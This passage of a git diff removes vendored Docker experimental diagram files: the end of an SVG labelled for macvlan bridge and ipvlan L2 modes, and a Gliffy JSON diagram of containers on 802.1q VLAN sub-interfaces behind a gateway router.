0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="151" y="15">Directly</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="209" y="15">to</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="226" y="15">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="278" y="15">Interface</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="340" y="15">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="349" y="15">No</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="374" y="15">Bridge</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="425" y="15">Used</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="462" y="15"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="472" y="15">Docker0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="16px" font-style="italic" font-weight="normal" text-decoration="" line-height="18.5px" x="531" y="15">)</text></g></g><g transform="matrix(1,0,0,1,4,7)"><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="22" fill-opacity="0"/></g></g><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="538" height="22" fill-opacity="0"/></g></g><g transform="translate(81,0) matrix(1,0,0,1,0,0) translate(-81,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="81" y="0" width="376" height="22" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="81" y="19">Macvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="166" y="19">Bridge</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="235" y="19">Mode</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="287" y="19"> &amp;</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="312" y="19">Ipvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="376" y="19">L2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="20px" font-style="normal" font-weight="bold" text-decoration="" line-height="22.75px" x="405" y="19">Mode</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
deleted file mode 100644
index 40eed17270..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy
+++ /dev/null
@@ -1 +0,0 @@
-{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container1 - vlan10</span></span></p><p style=\"text-align:center;\"><span style=\"\">192.168.1.2/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"text-decoration:none;font-family:Arial;font-size:12px;\"><span style=\"text-decoration:none;\"><br /></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0 - 802.1q trunk</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.10</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.20</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container2 - vlan20</span></span></p><p style=\"text-align:center;\"><span style=\"\">172.16.1.2/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-family:Arial;font-size:12px;\"><span style=\"\">container3 - vlan30</span></span></p><p style=\"text-align:center;\"><span style=\"\">10.1.1.2/16</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">eth0.30</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:left;\"><span style=\"\">Network Router (gateway)</span></p><p style=\"text-align:left;\"><span style=\"\">vlan10 - 192.168.1.1/24</span></p><p style=\"text-align:left;\"><span style=\"\">vlan20 -&nbsp;</span><span style=\"\">172.16.1.1/24</span></p><p style=\"text-align:left;\"><span 